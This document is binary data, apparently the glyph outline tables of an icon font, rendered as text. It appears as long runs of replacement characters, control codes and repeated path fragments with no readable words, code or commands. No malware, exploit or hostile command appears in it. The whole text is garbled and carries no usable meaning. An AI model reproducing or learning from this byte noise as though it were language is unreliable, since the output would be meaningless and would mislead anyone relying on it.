�� T<<TT<<T  +8%#53533###!"&5!.#"15463!!22654&#"3@`` `` ���&�)+L8!�_&`@�&PIggIIggI� `` `%`p!8L+9��%�%@�gIIggIIg  *7DH%1.546325!3!"&5463!!2#"&'1!54&#!'!"2654&#"3'35�	
gI��
��x&&`@�&+5gI)G�X`
�l?��
0<TT<<TT<p�(Ig���
 %@%�%�T3Ig#�@
�
�� T<<TT<<T�    ,0%!"&5!.#"15463!!21"&54632'35���&�)+L8!�_&`@�&PIggIIgg��`%`p!8L+9��%�%@�gIIggIIg�    	$>K32654&'.#"'1.546325!3!"&5463!!2#"&'1!54&#!'!"��-<T%-<T,	
gI��
��x&&`@�&+5gI)G�X`
�l?��
*�T<.*T<.
(Ig���
 %@%�%�T3Ig#�@
�
�  
)5#"&'7'.#"7!"&5!.#"15463!!2�gI 8�:!Ig����&�)+L8!�_&`@�&?8 Ig�gI!:��%`p!8L+9��%�%@@`� -33#!"&5!75463!!2%'!"3!2654&#!3'5�
��
�``�`
M?�
�`@��&& %&��@�@@��

`��``@�
�
@��%��%%�%��@@�@`� !3#!"&5!7%5463!!275#�%��&``�@&`@�&��@@���%%`��``  �%�%@ �@@��@`Udkx5#535#535#535#535#535#535#5#"3!265#"&=#3#3#3#3#3#3##"&54679#!"&5463!';'"32654&#�             `

�
�%�            $/!!/%�%� %&`��
v��~"             
� 

 %�            B,!//!,��%&�&ఐ
��0�@`Y_l5#535#535#535#535#535#535#535#"3!265#"&=##3#3#3#3#3#3##"&54679;"32654&#�              �&%�%�&�             $/!!/%�
��p~"              &� &% %�             B,!//!,�
���@`Rcp32654&'535#535#535#535#535#535#532#!"&546;3#3#3#3#3#3#3"3!2654&#!12#"&546%/!!/$            �(88(��(88(�             �5KK5`5KK5����,!//!,B            8(��(88(`(8             �K5��5KK5`5K��@`Wd5#535#535#535#535#535#535#535#"3!2654&+#3#3#3#3#3#3##"&54679"32654&#              �5KK5`5KK5�             $/!!/%~"              K5��5KK5`5K             B,!//!,�pP 1#".54>32"'%2>54.#"3n"P,8cJ++Jc88cJ++%���2WA&&AW22WA&&AW22+Jc88cJ++Jc88c%��&AW22WA&&AW22WA&��` 3#".54>321"/'2>54.#"3n"P,8cJ++Jc88cJ+�

&
��+L8!!8L++L8!!8L+2+Jc88cJ++Jc8,P"�%


�!8L++L8!!8L++L8!�pp +@533##5#5#".54>327"/72>54.#"3� �� �E$]48cJ++Jc88cJ+% ���2WA&&AW22WA&&AW2 �� �� � %+Jc88cJ++Jc84]$��%&AW22WA&&AW22WA&��` *?533##5#5#".54>321"/'2>54.#"3� �� �."P,8cJ++Jc88cJ+�

&
��+L8!!8L++L8!!8L+ �� �� �+Jc88cJ++Jc8,P"�%


�!8L++L8!!8L++L8!�pp 48#".54>327"/72>54.#"3!5�$]48cJ++Jc88cJ+% ���2WA&&AW22WA&&AW2� E %+Jc88cJ++Jc84]$��%&AW22WA&&AW22WA&  ��` 37#".54>321"/'2>54.#"3'!5n"P,8cJ++Jc88cJ+�

&
��+L8!!8L++L8!!8L+� 2+Jc88cJ++Jc8,P"�%


�!8L++L8!!8L++L8!�  �@`+I_hy9.54632#"&5'326=>54&#"154>322#!"&54639;54632354.#"!54&#""3!2654&#!�	
 /!!/�&AW22WA&(88(� (88(  gIIg !8L++L8!@ T<<T`%%�%%� S		@@@!!//!!p2WA&&AW2p8(��(88(@(8pIggIpp+L8!!8L+pp<TT<�&��&&@&�@`2;1.54632#"&59"3!2654&#54.#"354632�	
�(88(�(88(&AW22WA&`T<<TS		P8(��(88(@(8p2WA&&AW2pp<TT<p ����+Vr�%9.54632#"&5'326=>54&#"1!2#!"&546354&#"#"&=4>32'4.#"3126=46323"3!2654&#!�	
 /!!/`�(88(� (88(T<<T&AW22WA& !8L++L8!
	gIIg @%%�%%� �S		@@@!!//!!8(��(88(@(8�<TT<��2WA&&AW2��+L8!!8L+�		�IggI� &��&&@& ����@%326=>54&#"14&#"#"&=4>32!2#!"&54635�
	�T<<T&AW22WA&�(88(� (88(�S		S�<TT<��2WA&&AW2�8(��(88(@(8����`�.Ndz�#"&=4&#"!2#!"&546354>32'4.#"3546323126=9.54632#"&5'326=>54&#"1'"3!2654&#!T<<T(88(� (88(&AW22WA& !8L++L8!gIIg
	�	
 /!!/�%%�%%� �`�<TT<�8(��(88(@(8�2WA&&AW2  +L8!!8L+��IggI�		��S		@@@!!//!!�&��&&@&���`�D%9.54632#"&554.#""3!2654&#!&4=4632326=	
&AW22WA&(88(�(88(��T<<T�S		  2WA&&AW2�8(��(88(@(8�<TT<t##T�``
9=AEIMcl7!54&#!"373!265!%5#54>322#!"&5463937#37#37#37#37#354632354.#"!54&#"�`%� %0H%�%��`0�(&AW22WA&(88(� (88(@0@0@0@0@0@0@0@0@0@�x gIIg !8L++L8!@ T<<T�&&� @@`%% @@�p2WA&&AW2p8(��(88(@(8��@@@@@@@@@@pIggIpp+L8!!8L+pp<TT<
�`` $9B%5##!"&5!%53373373373373373754&#54.#""54632`80h8(� (8��`h0 0@0 0@0 0@0 0@0 0@0�8(&AW22WA&(8�T<<T�@@ (88( @@@@@@@@@@@@`�(8p2WA&&AW2p8(� p<TT<p�``*Lbk�1.54632#"&5'326=>54&#"154>322+".=4639;54632354.#"!54&#"";2>=4&#!	
 /!!/�&AW22WA&(8(F]5�5]F(8(  gIIg !8L++L8!@ T<<T`%#=R.�/Q=#%� S		@@@!!//!!p2WA&&AW2p8(�5]F((F]5�(8pIggIpp+L8!!8L+pp<TT<�&�.R=##=R.�&�``6?1.54632#"&59";2>=4&#54.#"354632	
�(8(F]5�5]F(8(&AW22WA&`T<<TS		P8(�5]F((F]5�(8p2WA&&AW2pp<TT<p@���+Zv�%9.54632#"&5'326=>54&#"1!2+".=46354&#"#"&=4>32'4.#"3126=46323";2>=4&#!�	
 /!!/`�(8(F]5�5]F(8(T<<T&AW22WA& !8L++L8!
	gIIg @%#=R.�/Q=#%� �S		@@@!!//!!8(�5]F((F]5�(8�<TT<��2WA&&AW2��+L8!!8L+�		�IggI� &�.R=##=R.�&@���D%326=>54&#"14&#"#"&=4>32!2+".=4635�
	�T<<T&AW22WA&�(8(F]5�5]F(8(�S		S�<TT<��2WA&&AW2�8(�5]F((F]5�(8����`�2Rh~�#"&=4&#"!2+".=46354>32'4.#"3546323126=9.54632#"&5'326=>54&#"1'";2>=4&#!T<<T(8(F]5�5]F(8(&AW22WA& !8L++L8!gIIg
	�	
 /!!/�%#=R.�/Q=#%� �`�<TT<�8(�5]F((F]5�(8�2WA&&AW2  +L8!!8L+��IggI�		��S		@@@!!//!!�&�.R=##=R.�&���`�H%9.54632#"&554.#"";2>=4&#!&4=4632326=	
&AW22WA&(8(F]5�5]F(8(��T<<T�S		  2WA&&AW2�8(�5]F((F]5�(8�<TT<t##T�``<R[%5!5!5!5!5!5!4&#!"3!265!5!54>322#!"&54639;54632354.#"!54&#"@�� �� �� %� %%�%�� ��&AW22WA&(88(� (88(  gIIg !8L++L8!@ T<<T�@ @ @ %&��&% �p2WA&&AW2p8(��(88(@(8pIggIpp+L8!!8L+pp<TT<�``)2%!5!5!5!5!5!5!5!4&#54.#""3!26554632`��@��@��@��@8(&AW22WA&(88(�(8� T<<T` @ @ @ (8p2WA&&AW2p8(��(88(�p<TT<p �`#8CN[%#!"&=#"&546;5463!232#%5!32654&#!";"!54&#!3!26=!%2654&#"3 %� %@(88(@%�%@(88(�``@&&� &&@@
 
�  
�
�� 



` %% 8( (8�%%�8(��(8 ��% &%��&�
��
���

�



 �`
)65463!2!#"&5463!2+!3!265!%2654&#"3�%�%��  (88(�(88( �` %�%��@



`�%%��8( (88(��(8 �%%`



 ����#8CN[%32654&+54&#!"#";3!265%#"&5463!2+5!!2!5463!#!"&=%2654&#"3 @(88(@%� %@(88(@%�%��@&&�&&@��@�
��
  
� 
 



�8( (8�%%�8(��(8�%%�& %&��%``�
��
���

�



 ����
)65463!2!#"&5463!2+5!3!265!%2654&#"3�%�%��  (88(�(88( �` %�%��@



��%%��8( (88(��(8� �%%�



@�`#8CN[_c%#!"&=#"&546;5463!232#%5!32654&#!";"!54&#!3!26=!%2654&#"3!5!5@%� %@(88(@%�%@(88(�``@&&� &&@@
 
�  
�
�� 



�� �` %% 8( (8�%%�8(��(8 ��% &%��&�
��
���

�



�  `  @�`
)6:>5463!2!#"&5463!2+!!#!"&5%2654&#"3!5!5�%�%��  (88(�(88( �` `%� %@



�� �`�%%��8( (88(��(8 �%%`



�  `   ����#8CN[_c%32654&+54&#!"#";3!265%#"&5463!2+5!!2!5463!#!"&=%2654&#"3!5!5 @(88(@%� %@(88(@%�%��@&&�&&@��@�
��
  
� 
 



�� �8( (8�%%�8(��(8�%%�& %&��%``�
��
���

�



�  `   ����
)6:>5463!2!#"&5463!2+5!!#!"&5%2654&#"3!5!5�%�%��  (88(�(88( �` `%� %@



�� ���%%��8( (88(��(8� �%%�



�  `  
��`&*.26:>BFJN!#53!53#'#5#"&=!"#463!';'3#3#35#3#3#3#35#3#3#3`�`  �    �%��
 &`��
v�� ` ` ` ` ` ` ` ` ` @@�@@���%�
�`�&ఐ
���� ���� ��� ��� ��� 
��`!%)-159=AE!#53!53#%463!;;3#3#35#3#3#3#35#3#3#3`�`  �  ��&@&��
�  ` ` ` ` ` ` ` ` ` @@�@@���&�%��
���� ���� ��� ��� ���   �`1<IMQUY]aeimq%326=4&+54&#!"#";5!%"&=463!2#5!!2!54632654&#"33335333353353353333533#35@ (88(@%� %@(88( ��@%&�&%� ��
��




��             `   � �8(�(8�%%�8(�(8`` %�%%�&``@
��
�`



�������������
  �`
+/37;?CGKOS5463!2!#"&=463!2+5!%2654&#"33335333353353353333533#35�%�%��  (88(�(88( �``



��             `   � `�%%���8(�(88(�(8``



�������������
� ��'+/37CW^%#53326=#+#53#53#53#"&=3;%5#!53%5#!53%53#5!#53%#5#"&=!"#463!';'�@@  % 
 �@@`@@`@@` % 
  �� @ �� `  �`  � �%��
 &`��
v�   %  
       &  
`@@@@`@@@@�@�@@�@ �%�
�`�&ఐ
�
� ��#'+7COU%#5335##5335##"&=3;%5##5%5335%53#5!#53%5#"&=!"+5326=;`@@ @@�@@ @@� % 
    ��   `  �`  ��&��&`%  
�
�         &  
�@@ @@ @@ @@�@�@@�@ �%�&�`�� % 
 �
@�K%'7'##"&54671.54632>321+32654&'1.#".#"1;5�h��h  �5K9*pP?b.9R)7K5��B^8,`@'g?.R=#*6^B�Xh��hh�K5-F
	PpH8M7
E-5K ^B2P<P		3?#=R.O1B^ @�)-%!2654&'1.#".#"13!'7'5'35B^8,`@'g?.R=#*6^Bh��h  �^B2P<P		3?#=R.O1B^�h��h����@`� K'7'#'#"&54671.54632>321+32654&'1.#".#"1;5�h��h  �5K9*pP?b.9R)7K5��B^8,`@'g?.R=#*6^B��h��h���K5-F
	PpH8M7
E-5K ^B2P<P		3?#=R.O1B^ @`� )-!2654&'1.#".#"13!5'7'#35B^8,`@'g?.R=#*6^Bh��h  ^B2P<P		3?#=R.O1B^�h��h���@�� !EHLP#"&54671.54632>321+'32654&'1.#".#"1;!!73535l�5K9*pP?b.9R)7K5���yB^8,`@'g?.R=#*6^By9�И�Ј    K5-F
	PpH8M7
E-5K�� ^B2P<P		3?#=R.O1B^` ��``�  @�� "%)-32654&'1.#".#"1;!73535�QB^8,`@'g?.R=#*6^BQ��`�   ^B2P<P		3?#=R.O1B^@@���``�  @���@3!2654&'1.#".#"1%#!"&54671<54>32>329�*9K5 5K7)R9.b?Ppy,8^B��B^6*#=R.?g'@`�
F-5KK5-E
7M8HpP	P2B^^B1O.R=#?3		P<@���#!"&54671<54>32>32<,8^B��B^6*#=R.?g'@`�P2B^^B1O.R=#?3		P<`���#(-23'!3;26=+"&=#!5%5!!!'!!'!!'!�ٌ�F��%�% /!�!/���������*��L&&����@&%@ 0!//!0������  @  @  `���#;26=3'!3!!!!'!!'!!'!`%�%ٌ�F���������*��L&&��@&%@������  @  @  �``%#3'3#546;274&+"@��99r�
@
@`&@%���JJ@`

���&&�`�``%#'54&+"`��``�&@%�� ��@`&&`��3�	''7627'7>/&"��SijS7		&		7�Pe ��&4�-;��Si<S7

%

7��Oc� �5&�-��3�
764/.?'�7&47��� �jj���;75&8���� �j���`�`+BI	''76271'!"3!2657>/&"#!"&5463!;?#"&=N��SijS7		&		7�PeC���&%�%�&4s 
� 

@%��� ����v
;��Si<S7

%

7��Oct�&� &%@�5&s���

�
�%��� �а
�`�`/5'?64/&"7'%#!"&5463!;762;NS��Si7		&		7S�ePC%� %&@&��4&�
�;S��Si7

%

7S��cOt��%&�&�%�&5��

��� �#/CJNRVZ^k%9>54&#"!"&5463!;+593267'73265'!"3!75#"&=35'35!5!5!51"&54632�B..B�

@%�
@�

00�@%���&%PP@�v
��������`��`�p!//!!//�(.BB.("
�
�%��
"~00S%@�&� &�PP�0�
��  `  �  `  `  ��/!!//!!/	��� �#/59=AEIV%9>54&#"!"&5463!;+575#"&'1;!35'35!5!5!52654&#"3�B..B�%&@&�%@�00

@
��������`��`�p!//!!//!�(.BB.(B&�&�%��%B�00�5�
  `  �  `  `  ��/!!//!!/�`�!-CGKO\!2654&#!";5.54632975#"&'1#"&5463!2#!'5!5!5352654&#"3��

��

@B..B�00

 @&&�&&�`PP @�� ���0!//!!//!BB
�

�`
B(.BB.(~00~K%�%%�`%�PP��  `  `  `/!!//!!/���!-159F9>54&#"#"&5463!2#!575#"&'1!5!5352654&#"3�B..B@&&�&&�`�00

@@�� ���0!//!!//!B(.BB.(b%�%%�`%b�00�5  `  `  `/!!//!!/	�@�@"&*#5!!#!7!'5!!3'353535'35`����`��� ������� ` @`������ ��@��������������  �  @  �@�@#!35!!!3!#3#353535'35�@�@��@�����@��``   `������ �� �����  �  @  `@�@-5!!!'!!32+"&5463";2654&+`���'Ҍ�F��@�%%�%%

�

�0���� �@��%%%% 



`@�@	!!'!";2654&+`������F�%%�%%�@����%%%%`@�@	
+05:!!'!!32+"&5463";2654&+!'!!'!!'!`������F��@�%%�%%

�

�`���*��L&&�@���� �@��%%%% 



�  @  @  `@�@	"'!!'!";2654&+!'!!'!!'!`������F�%%�%%�`���*��L&&�@����%%%%�  @  @  `��-15!!!'!!32+"&5463";2654&+!5`���'Ҍ�F��@�%%�%%

�

����p������@��%%%% 



@```��!5!!!";2654&+��� �ࠠ ���%%�%%�```�� ����%%%%@@� -#!#!!%!532+"&5463";2654&+�@`@�  ��  � �%%�%%

�

� �� �@����%%%% 



@@� !%5!";2654&+`�  ��`%%�%%� � � ��%%%%@ �3!!7!3!7!!3'5�`�`�``���@��  ���@@�@���`` � ��� �@@�@ �!!775!75#`� �``���@@�� ��``  �� �@@�R�)'Nf3"'4672?64'#.'.'92012#"&546581:12654&'041.'9'.35"&7635"&'1X���5�T
�
	�

�[�!//!!/%1
<IG"5;%' �''�T5��"	�[
	�
	�
`/!!//!E4="8� o(4Sb= -XS�(+C3"'46781:12654&'401.'.'9.35"&7635"&'1X���5�T/,	
<IG#6:%' �''��T5��"bQ	5/
5<"8� o)3Sb= -X�Tl@*7	"'463!#"2?64'1"&54632'2654&#"3���5�T%�
�
	�

�[�!//!!//!@�T5��% 
�[
	�
	��/!!//!!/ �Tl@	"'463!2654&#"3���5�T%�@�T5��%�`4�@%4AN9>3!'"'46;#"2?%#"2?64'1"&54632'2654&#"3�	��*5�T%( 
�
	�]0�
�
	�

�[�!//!!//! �T5�	�% 
�[
	� 
�[
	�
	��/!!//!!/ `.�@*"789%"'463!2654&#"3�%�0�@`��5�T%� %��T�0 �T5��%��Tl@&AN[h533##5#57932672?64'!"7'546;"/>54&#"971"&54632'2654&#"31"&54632  `` `(0gI1Pd5��T�%X X
��

�	
lgI8!//!!//!<TT<<TT `` `` �P1Ig0(d�5�%�XY�
�^	
�	
m
Ig�/!!//!!/ � T<<TT<<T�Tl@(5B533##5#55'463!"/>54.#"972654&#"32654&#"3  `` `@%��5L!8L+8pIggIIggI `` `` �@%�T5�L8+L8!��gIIggIIg�Tl@5BO\`932672?64'!"7'546;"/>54&#"971"&54632'2654&#"31"&54632'35�(0gI1Pd5��T�%X X
��

�	
lgI8!//!!//!<TT<<TT���P1Ig0(d�5�%�XY�
�^	
�	
m
Ig�/!!//!!/ � T<<TT<<T�  �Tl@)6:'463!"/>54.#"972654&#"31"&54632'35�@%��5L!8L+8pIggIIgg���@%�T5�L8+L8!��gIIggIIg�  �Tl@5BO\c932672?64'!"7'546;"/>54&#"971"&54632'2654&#"31"&54632/77�(0gI1Pd5��T�%X X
��

�	
lgI8!//!!//!<TT<<TTLK4d{�P1Ig0(d�5�%�XY�
�^	
�	
m
Ig�/!!//!!/ � T<<TT<<T8L4d|�Tl@)6='463!"/>54.#"972654&#"32654&#"3/77�@%��5L!8L+8pIggIIggIK4d{�@%�T5�L8+L8!��gIIggIIgXL4d|�Tl@&AN[h%'7'77'932672?64'!"7'546;"/>54&#"971"&54632'2654&#"31"&546320DDDDDDD�(0gI1Pd5��T�%X X
��

�	
lgI8!//!!//!<TT<<TT�DDDDDDD�P1Ig0(d�5�%�XY�
�^	
�	
m
Ig�/!!//!!/ � T<<TT<<T�Tl@(5B%'7'77'463!"/>54.#"972654&#"32654&#"30DDDDDDD�@%��5L!8L+8pIggIIggI�DDDDDDD@%�T5�L8+L8!��gIIggIIg����4	"'1&47621"'1&47'12764'1&"127'���&j%&&uB��
	

��5v!!!]!��///�/���&&%j&uB��	
		��5u!]!!!��.�///� �@C%1".54>32"'&4?62"'&4?'2?64'&"2?'S�l??l�SS�l??l�0�&j%&&�B�		
	��5�!!!]!�///�/� ?l�SS�l??l�SS�l?n�&&%j&�B�

		��5� ]!!!�/�///�	� �@	&1;DLa1###.'1>731#.'>731#>799.'3>71#3.'2>54.#"3 Cx..8� �8..xC �8..xC Cx..8� *3�3**3�3*��3**3��3**3pS�l??l�SS�l??l�S 4*3�J`��J�3*4� `J�3*44*3�J��h.wCCw.�.wCCw.Cw..wC Cw..wC��?l�SS�l??l�SS�l?�!�@	)3<FQ%#1%.'3&'>71#11311#>71'.'3>713.'17>71#.'1�D82�J��%+�?4c/7�?43�J�D9/7�?43�J�D9��.8�?42�J�D8!R�4/8�/u@K�02�IK�0/8R�443�JL�0/8��R�53�JL�0/8��R�5� �@Pz��%1>77'>77'>735#.'7'.'7'.'>32''#3771#"&''.546777#31''1!9.'7'.'7'.'35#>77'>77'>72>54.#"3

  

1�HH�1

  

1�HH�1-33-


  


 


  


-33-��S�l??l�SS�l??l�S�(

, ,

(-44-(

, ,

(-44-1HH1
$

' '

$

$

' '

$
1HH1�?l�SS�l??l�SS�l?� �@V��%#"&'9>77'>77'>735#.'7'.'7'.'1>321''#317797>54&'''3#77"671%.546777#3''2&'1 6�OO�6


  


6�OO�6


  


)).81



  



��(-81



  



�2992(

, ,

(2992(

, ,

(+4GN�6
$

' '

$
3}FN�6
$

' '

$
� �@'5J1#"&'>54&'1>32.5467!9.5462>54.#"3	18811�HH�118811�HH�1-33--33-��-33--33=S�l??l�SS�l??l�S�6�NN�6-44-6�NN�6-44-1HH11HH11HH11HH��?l�SS�l??l�SS�l?� �@"1>.#"13267.54>71.54679!>54&' 6�OO�6/!!/6�OO�6/!!/18817@@7��18817@@7�2992BKR++RKB2992BKR++RKB6�NN�63�PP�36�NN�63�PP�3� �@)6CP%1".54>32'2>54.#"32654&#"32654&#"3#2654&#"3S�l??l�SS�l??l�SL�d::d�LL�d::d�L`� ?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:��� �@!.;%1".54>322654&#"32654&#"3#2654&#"3S�l??l�SS�l??l�S`� ?l�SS�l??l�SS�l?�� �@.CXer#"&5467.5463211".54>32'2>54.#"352>54.#"352654&#"352654&#"3@/!!//!!/0S�l??l�SS�l??l�SL�d::d�LL�d::d�L+L8!!8L++L8!!8L+�!!//!!!!//!!�p?l�SS�l??l�SS�l? :d�LL�d::d�LL�d:�!8L++L8!!8L++L8!`�� �@.CP]#"&5467.5463211".54>32'2>54.#"352654&#"352654&#"3@/!!//!!/0S�l??l�SS�l??l�S+L8!!8L++L8!!8L+�!!//!!!!//!!�p?l�SS�l??l�SS�l?�!8L++L8!!8L++L8!`�� �@&/4:@EMbh.'77'>7'73#"&/%'?''57%>.'7!7''>322>54.#"3#'7r(O�#z1S1qjygH�K"55#3K)p{#�M{iq1S0��*^�'CkkC'�^�\\..FS�l??l�SS�l??l�Sf)z)f�0�R*c7N")?\zV3��KN��O�/O7c*.4Vz\?)~^l=.U�0ff0&U.=JJ�?l�SS�l??l�SS�l?�S��S� �@&/D.'77'>7'73#"&/%'?''572>54.#"3r(O�#z1S1qjygH�K"55#3K)p{#�M{iq1S0�S�l??l�SS�l??l�S�0�R*c7N")?\zV3��KN��O�/O7c*.4Vz\?)~�?l�SS�l??l�SS�l?@���*18IMQ3#5463!2#3#!"&=%#5.546753'>54&'#"3!2654&#!3#%3#`��
 
��
��
� 6JJ6 6JJ6)77) )77)��%& %&���``�``  `

`��`

`��Q88Q��Q88Q?**??**?�%� %%�%����@���+29=A3!5.54675!"3#!#!5>54&'5!2#3%>54&'#%35!35@&�6JJ6��%���%��6JJ6�&���@)77) )77)`��`� `%�Q88Q�%`��`%�Q88Q�%`��!?**??**?�����`���+:BJ_##5##5##5##5#53533533533533533##1"&'>32%.1067!510%032>10.#"1�        @@         @@ pKx..xKKx..x��><<> ><<>�@1i�rr�i21i�rr�i2�@@@@@@@@ @@@@@@@@@@ @�% %%��%T+QQ+��+QQ+|KZKKZKKZKKZK`���+:AH##5##5##5##5#53533533533533533##32671.#".1067>10&'�        @@         @@ ��/xIIx//xIIx/ SMMS SMMS�@@@@@@@@ @@@@@@@@@@ @f!!l!!��5nn5��5nn5`���+@U#5##5##5##5##33533533533533535#5#'1210#".10>"1032>10.#�        @@         @@ pr�i21i�rr�i21i�rf�a//`�ff�a//`�f�@@@@@@@@ @@@@@@@@@@ @�KZKKZKKZKKZK ANAANAANAANA`���+@##5##5##5##5#53533533533533533##"1032>10.#�        @@         @@ pr�i21i�rr�i21i�r�@@@@@@@@ @@@@@@@@@@ @@KZKKZKKZKKZK� �@';J[i�%1.5467.'13:77>71.'1.'1>7111>54&'9>7.'>54&'1.54>32#".'.'(=5 N.EVe6
B_wB 3[&-#.6(AXm<
0T")e86_'#/07�+4^PA4s>(.ZEy/:m1��?l�SS�l??l�SI�hGA(R�6,L/N:#>jM,* C}72�I&�7^E)'K" O/$0	.#6zC2�K&| 7I,(0yC�6-	'B#�P S�l??l�SS�l?1UvD� �@/>P`q.5467#*932631.5467.'#*#91>54&'17.'>54&'1.546797>54&'9�*%I�;DVd7
Gh�I=5 N.J]l;oP�3F�9!CycHBu/"T0
�&X16.(/0"?q,(3�Cz2)#.L7 DuV17R�6,L1R; �E7)!B#(-Mh>3)/O "K'(�/&5I�2?�OBKS,(0(>�Nn�C"'2E^k%14&>7.'79>7>79%'7>/&'&"6764/7''>"/&47>9%"32654&#|1G%62F#4\4$3$�4$3$�b�	<?a<���-
NT
!�c(-
G<TT<;UU;�G15&F20"�$4$3�$4$3���=@6=����
-
�!T��
.(
�T<;UU;<Tn�C'59DS%.'1#"&#&45463:3&45463:1'232654&51%%'>'"/&47>yH3U;H3T<G1A/�2F.B���IS8T
!��k�
(-

J�2H;U2I<T!1G/A�F2B.���I�b!T��l�{.(
K� �@Fe"32>54.#".54>32#"&'.#"3267>32#11.#"#"&546323267S�l??l�SS�l??l�SL�d::d�L3`RC8/1+L8!!8L+:78CR`3p?##G
.IggI$H##?@?l�SS�l??l�SS�l?�:d�LL�d:1E)!8L++L8!
)E1p)M# 
gIIg	
!#M� �@'b&.'.#"#"&546323267>7'&'.#"32>7.'.#"#".54>323267>71x?##G
.IggI$H##?GWa5S�l??l�S7eYI87:+L8!!8L+1/8_#M(/X( 
gIIg	
!
)C0?l�SS�l?4H,
!8L++L8!�``%,3%5"&51.1!09#3!5;265!+0%>1Oq*2	�3*pP��� ^B B^�� ]$�$��pP^cMLc_Pp�  `�B^^B6IJ��JH6�`` '%#!5#52651>1!013.1!30� �Pp*2	�`3*qO�$�]$�  �pP^cMLc_Pp��JI66HJ�``%,3<%5"&51.1!09#3!5;265!+0%>1#5#52653Oq*2	�3*pP��� ^B B^�� ]$�$�� @( ��pP^cMLc_Pp�  `�B^^B6IJ��JH6��� %�`` '0%#!5#52651>1!013.1!30#5#52653� �Pp*2	�`3*qO�$�]$� @( �  �pP^cMLc_Pp��JI66HJ�� %� ``(/6:>%3!53535"&51.1!01#3;265!+0%>135!5�`� `�Oq*2	�3*pP���^B B^�� ]$�$�d�����`�pP^cMLc_Pp�@�B^^B6IJ��JH6��@@`@@� ``$+%5#52651>1!013##!5.1!30��Pp*2	�`3*qO�`�@$�]$�`�pP^cMLc_Pp�`����JI66HJ ���-B#>327!#>7'!#".546712>54.#"3`�(( ,��`,L4�4&AW22WA&�+L8!!8L++L8!!8L+��2�$�����?���`�L*2WA&&AW2*L��!8L++L8!!8L++L8! ���-#>323.'+>72>54.#"3`�(( �(-�(-p2WA&&AW22WA&&AW2��4�`x!�`x!�@&AW22WA&&AW22WA& ���-BL#>327!#>7'!#".546712>54.#"357'373`�(( ,��`,L4�4&AW22WA&�+L8!!8L++L8!!8L+YPp  pP ��2�$�����?���`�L*2WA&&AW2*L��!8L++L8!!8L++L8!�BoQ``Qo ���-7#>323.'+>72>54.#"357'373`�(( �(-�(-p2WA&&AW22WA&&AW2YPp  pP ��4�`x!�`x!�@&AW22WA&&AW22WA&�BoQ``Qo`�`ETcr�!#"&=#"&=#5354632154632!54632>323##"&'#"&=7"326=4&#!"326=4&#%"32654&#!"32654&#�`@@�@@p	
	
��	
	
@	
	
�	
	
�p0 0pp0 0p`	�		�		�		�	@	�
	
	�
	
`�`E!#"&=#"&=#5354632154632!54632>323##"&'#"&=�`@@�@@�p0 0pp0 0p*@����
#'/3:>EIMQV\`dkovz~����������������35#35#535#5#35+1735+135735+13735#53535#35#355#5#535'35735.'#35'35.'35#35353#3.'.'3535#>7#'35#>715735#>71##>'35#735#.51##35##"&=46715.'151>3211"326=4&#1�    *   9 @	  @   @ `        @")    ` Z   @ `   3�    	"@     \ 	�  @  `�  �nMMn"8J**J8"�	
	
  W  
@   �  
b  	 @  � 4� ` �  R	
 �  @  �    `    @   (
   � @	  @ `  	  "*      @cY����Yc BtW33WtB ��	�		�	)@����
#'/3:>EIMQV\`dkovz~����������������35#35#535#5#35+1735+135735+13735#53535#35#355#5#535'35735.'#35'35.'35#35353#3.'.'3535#>71#'35#>715735#>71##>'35#735#.51##35##"&=46715.'151>3211�    *   9 @	  @   @ `        @")    ` Z   @ `   3�    	"@     \ 	�  @  `�  �nMMn"8J**J8"  W  
@   �  
b  	 @  � 4� ` �  R	
 �  @  �    `    @   (
   � @	  @ `  	  "*      @cY����Yc BtW33WtB ��`	&/9CMW`lx����1'.''.'75.'1211&"#2372637*5162?1>??>71'.'1895"&#897"#979>717'1"45#!##3!3''9>3235!'#!#1#"&'972654&#"3�	

	[	 	[	


	�!&D�D�D����`@@`$�``��� @+,@p<TT<<TT<5!	&$%" !      ! "$%&	!�
 

� ��>��`>"%%���f� g!"���` 1>1"45#!##3!3''9>3235!'#!#1#"&'972654&#"3eD�D����`@@`$�``��� @+,@p<TT<<TT<~ ��>��`>"%%���f� g!"��`A =LYf!>/.+";267!+"&57.?>;2130&'"+*'4&#"3265#4632#"&5�	#8H((H8#	]9!9]�}`
	*H2)@T.!.T@)2G*l` 
�&%%&`

�0"'F44F'"0 +54,��

�
.BR.!/Q=##=Q/!.RB.	7jj7&&&&



�`A 0=.?>;2!;267!+"&?;2679%4&#"3265�)@T.!.T@)�qHHq�4,

`
 
&%%&�0!/Q=##=Q/!0 9GG9��

�
%%%%� �@-E`x��&'.5467>17167>7>#.7.&47"672632'11&7.'.'61&'.'.>7>76#"&'.314.#"32>5�
-"K(&"
#	: :" .>*[bf42\QC$QX_28mf_)��
	1-ULB/X*IZi:/7dVE%CDZk;8?l�SS�l??l�SS�l?�/`\X(&
&S,=p.$	)SSP''D*\`c2q':/A(8
,	/")U+0 �L)	/=K,;cP9=Qc9,4W?#	\S�l??l�SS�l??l�S� �@2Jbx�.67>54&'.1'.&67"63>32'1.'"32>7>1>7.'&#1'>7.74'1>7.47671�+gq{?7g`V%,fnv<

?s`J"Q-Ocs>$N*>r`K��@xgR*X/IU_2(�1[)#107h	0$":"?�)>'+U)(8#,
9#5 
%J$%B\7��"8?lU=$A[6�
8RkA0Q?.
&
�+-eim55�M4`+
7olh/D'+Y[\,���`�2Wj����>7.54632117'7'#".5467''7762#"&'"'&4?.546329>54&#"5#53#32654&+>7326=#";54&#".2>54.#"352>54.#"32654&#"3�%Z3B..B3Z%'D(-4:d�LL�d:4-(D'cd
#$
%/!!/% ` �O		O%<O-
	-O<%O		O%<O-
	-O<%�Fz[55[zFFz[55[zF8cJ++Jc88cJ++Jc8				_".
-.BB.-
."(D'1�HL�d::d�LH�1'D(�dc
$#
G,!//!,>  �@
	-O<%O		O%<O-		-O<%O		O%<O��5[zFFz[55[zFFz[5@+Jc88cJ++Jc88cJ+				���`�$Vi���762#"&'"'&4?.5463297#".5467''7>71.546327'7''>54&#"5#53#154632>7#"&546;.'1#"&=32#2>54.#"32654&#"3cd
#$
�-4:d�LL�d:4-(D'%Z3B..B3Z%'D(�%/!!/% ` �%<O-	
-O<%O		O%<O-	
-O<%O		�8cJ++Jc88cJ++Jc8				{dc
$#
�1�HL�d::d�LH�1'D(".
-.BB.-
."(D'y,!//!,>  �@-O<%O		O%<O-		-O<%O		O%<O-	
�+Jc88cJ++Jc88cJ+				� ``AVc54632#"&=.54671%7'7'#".54>75#53#2>54.#"32654&#"3�	
	
